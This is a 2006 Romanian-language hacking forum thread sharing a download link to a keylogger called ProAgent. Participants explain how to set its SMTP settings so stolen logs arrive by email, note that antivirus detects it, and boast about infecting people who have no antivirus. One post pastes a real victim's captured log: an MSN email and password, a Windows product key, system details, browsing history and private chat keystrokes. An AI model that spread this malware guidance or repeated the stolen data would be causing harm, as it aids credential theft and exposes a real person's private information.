Xd3Rn Posted October 9, 2006 Report Posted October 9, 2006 http://share.urbanfriends.us/uploads/a2ab73b2af.zip Quote
extazy69 Posted October 9, 2006 Report Posted October 9, 2006 O descriere ceva??? sa stim despre ce ii vorba Quote
Guest Nemessis Posted October 10, 2006 Report Posted October 10, 2006 Keylogger. Detectabil dar eficient. Quote
hanibal Posted October 10, 2006 Report Posted October 10, 2006 nasol ca e detectabil acu cam toti av-uri Quote
MaHaReT Posted October 10, 2006 Report Posted October 10, 2006 ce nick , parca seamana cu a lu kwr [daca ma ajuta cineva ... am creeat serveru , lam trimis la una ...amu ? binentzeles am modificat e-mailu cu a meu, imi vin pe e-mail logarile ? ori le aut io pe udenva ?] Quote
Gonzalez Posted October 10, 2006 Report Posted October 10, 2006 iti vin la bulk [ la yahoo ] cam ceva de genu : ================================ProAgent : [W-NLING6189E5KG is Online]IP Address(es) :86.125.148.215Agent Version :v2.0Computer Name :W-NLING6189E5KGDate :2006.10.08.Time :22:51:21==================================================================================Software : MSN MessengerProtocol : MSN MessengerUser : [mail]m.kati16@hotmail.com[/mail]Password : 264035============================================================= CuteFTP ======================= FlashFXP ======================= WS_FTP ======================= FileZilla ===========0============= eXeem ====================================================Proxy IP : Proxy Username : Proxy Password : =======================================00========= CRYPTED DATA =========W1BdDQpWOiAxLjANClM6IE1BSUwgRlJPTTogY29iYW4ya0BtYWlsLnJ1DQpEOiA5NDdENzBDRQ0KUkNQVCBUTzogY29iYW4ya0BtYWlsLnJ1DQoNClsyMDAzXQ0KUzogRTYgMTYgNEMgMzUNCltNXQ0KWzk5Yl0NCltUQiFdDQpbVF0NCltGQVJdDQpbV1RDXQ0KW1JBU10NClsmXQ0K=========== CD-Keys =========================================Windows Serial : FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8======================================= PC Information =======Computer Name : W-NLING6189E5KGUser Name : zsigaWindows Ver : Windows XP 5.1.2600 Windows Language : magyarWindows Folder : C:WINDOWSSystem Folder : C:WINDOWSSystem32Temp Folder : C:DOCUME~1zsigaLOCALS~1TempAppData Folder : C:Documents and SettingszsigaApplication DataCookies Folder : C:Documents and SettingszsigaCookiesDesktop Folder : C:Documents and SettingszsigaAsztalFavorites Folder : C:Documents and SettingszsigaFavoritesNetHood Folder : C:Documents and SettingszsigaNetHoodPersonal Folder : C:Documents and SettingszsigaDokumentumokPrintHood Folder : C:Documents and SettingszsigaPrintHoodRecent Folder : C:Documents and SettingszsigaRecentSendTo Folder : C:Documents and SettingszsigaSendToStart Menu Folder : C:Documents and SettingszsigaStart MenuTemplates Folder : C:Documents and SettingszsigaSablonokPrograms Folder : C:Documents and SettingszsigaStart MenuProgramsStartup Folder : C:Documents and SettingszsigaStart MenuProgramsIndÃÂÂÂtópultLocal Settings Folder : C:Documents and SettingszsigaLocal SettingsLocal AppData Folder : C:Documents and SettingszsigaLocal SettingsApplication DataCache Folder : C:Documents and SettingszsigaLocal SettingsTemporary Internet FilesHistory Folder : C:Documents and SettingszsigaLocal SettingsHistoryMy Pictures Folder : C:Documents and SettingszsigaDokumentumokKépekFonts Folder : C:WINDOWSFontsMy Music Folder : C:Documents and SettingszsigaDokumentumokZeneAdministrative Tools Folder : C:Documents and SettingszsigaStart MenuProgramsFelügyeleti eszközökCD Burning Folder : C:Documents and SettingszsigaLocal SettingsApplication DataMicrosoftCD BurningProductId : 55274-640-0000356-23378Workgroup : NOData : 2006.10.08.Time : 22:52:23Pc is open for : 0 Hour(s) 3 Minute(s)Resolution : 1024x768I.Explorer Ver : 6.0.2600.0000I.E. Start Page : Printer'>http://chat.hu/Printer : NOProcessor Name : Vendor Identifier: GenuineIntelIdentifier : x86 Family 6 Model 8 Stepping 6CPU Speed : 730 MhzSound Card(s) Information:Display Adapter(s) Information:RADEON 7000 SERIES RADEON 7000 SERIES NetMeeting driverRDPDD Chained DDInstalled Programs:1) &RQ2) AddressBook3) Adobe Shockwave Player4) All ATI Software5) ATI Display Driver6) BGroom7) BPS Spyware Remover_is1 Branding9) Connection Manager10) Cubis Gold11) DC++12) DirectAnimation13) DirectDrawEx14) DivXG40015) DXM_Runtime16) Fontcore17) Games Pack 20051b) ICW19) IE4020) IE4Data21) IE5BAKEX22) IEData23) Light Driver 224) Living Waterfalls Wallpaper #125) Microsoft NetShow Player 2.026) mIRC27) MobileOptionPack2b) MPlayer229) MyWebSearch bar Uninstall30) Nero - Burning Rom!UninstallKey31) NeroMultiInstaller!UninstallKey32) NeroVision!UninstallKey33) NetMeeting34) New.net35) NMPUninstallKey36) OutlookExpress37) PCHealth3b) SaveNow39) SchedulingAgent40) Shockwave41) ShockwaveFlash42) Skype_is143) ST5UNST #144) Trillian45) WhenUSearch46) Winamp47) Windows Media Format Runtime4b) Windows Media Player49) WinRAR archiver50) Yahoo! Companion51) Yahoo! Customizations52) Yahoo! Friend53) Yahoo! Internet Mail54) Yahoo! Messenger55) Yahoo! Toolbar56) YInstHelper57) {0BEDBD4E-2D34-47B5-9973-57E62B29307C}5b) {2318C2B1-4965-11d4-9B18-009027A5CD4F}59) {2DFF31F9-7893-4922-AF66-C9A1EB4EBB31}60) {350C97C5-3D7C-4EE8-BAA9-00BCB3D54227}61) {54DC27A1-2708-421E-8915-119955DB3B92}62) {8428F803-0715-4BF7-9EC1-DE174DE3C95C}63) {90AF0409-6000-11D3-8CFE-0150048383C9}64) {9AB77E48-5BAF-4EBA-A88B-40CAF43F237E}65) {A1FE4FEC-81C2-4A4B-9BAE-1F5D1238AD3B}66) {AF5E8D43-49AD-4BE7-A941-2BB0A8CACA62}67) {D271DAE0-8D68-4C97-8356-A126D48A1D8C}6b) {F652D238-5F29-42D5-BAF3-0115EF977EC2}============== URL History ===============http://www.sex.ro/http://freemail.hu/http://www.freemail.hu/http://www.google.com.www.stonyhill.eduww.stonyhill.ms.eduwww.stonyhill.edu.mswww.puntul.rohttp://www.hbo.ro/http://google.hu/http://www.tvmures.ro/http://www.orange.ro/enjoy/mmshttp://www.erd.ro/http://www.ujkelet.ro/http://leocadia.freeblog.hu/Files/leo/zene/szinglimix.mp3http://sex.ro/http://www.sexmania.com/http://www.danubius.hu/artist/50702www.gaga.tgm.huwww.gagaradio.huwww.corina.rohttp://www.hi5.com/www.protv.rohttp://www.google.ro/www.sex.hu======= PROCESSES INFORMATION =======[system Process]SystemSMSS.EXECSRSS.EXEWINLOGON.EXESERVICES.EXELSASS.EXEATI2EVXX.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXEATI2EVXX.EXEcisvc.exesvchost.exeSVCHOST.EXEwdfmgr.exeFVProtect.exeSearch.exewhse.exeYahooFriend.exeRUNDLL32.EXEmwsoemon.exectfmon.exeSpyRem.exeSkype.exeIEXPLORE.EXEmsnmsgr.exeSave.exelicense_manager.exeGoogleToolbarNotifier.exeYmsgr_tray.exewuauclt.exeEXPLORER.EXE============= KEYLOG =============[Windows title: "Dj Swamp from T-gang (djswamp_fromtgang) - Instant Message"]szia a [Windows title: "Dj Swamp from T-gang (djswamp_fromtgang) -- Instant Message"]tesod?azert nem veszi felna mind 1iges nem kel fel?na mind 1mar reg lefekudt?na mind1mond meg neki h el vagyok menve ejszakara a smurdhoz s ha felkel hivjon feldolgozninemonkentess me nem mentena mind 1 en mentem es mond meg neki amit uzentemszia Quote
MaHaReT Posted October 10, 2006 Report Posted October 10, 2006 cate informatzii inca nu mia venit nimic ... nu tsi la ce interval de timp vine e-mailu de la rularea serverului ? Quote
big Posted October 10, 2006 Report Posted October 10, 2006 cred ca nu iti vor veni niciodata Nemessis wrote: Keylogger. Detectabil dar eficient. :@ Quote
Gonzalez Posted October 11, 2006 Report Posted October 11, 2006 Razvan normal ar fi...ca dupa 5 minute sa primesti mail,dar daca victima are AV bun, nu vei primii Quote
Guest Nemessis Posted October 11, 2006 Report Posted October 11, 2006 Seteaza SMTP. In cazul in care vrei sa vina pe un mail de yahoo pune unul din urmatoarele servere de smtp:mx1.mail.yahoo.commx2.mail.yahoo.commx3.mail.yahoo.commx4.mail.yahoo.comPortul lasa-l 25.Primesti un mail la instalarea serverului si cate un mail la fiecare logare de administrator pe pc-ul respectiv (adica dupa fiecare restart). Quote
crystygye Posted October 11, 2006 Report Posted October 11, 2006 deci merge boboc.primu email se termite cand acceseaza virusu si e gol de informatii.dar dupaia tata......de nu curge imi vin ca spamuri emailurile de la ei ai de citit Quote
robib Posted November 30, 2006 Report Posted November 30, 2006 nasol ca e detectabil dar am trimis la un fraier care navea antivirus si merge Quote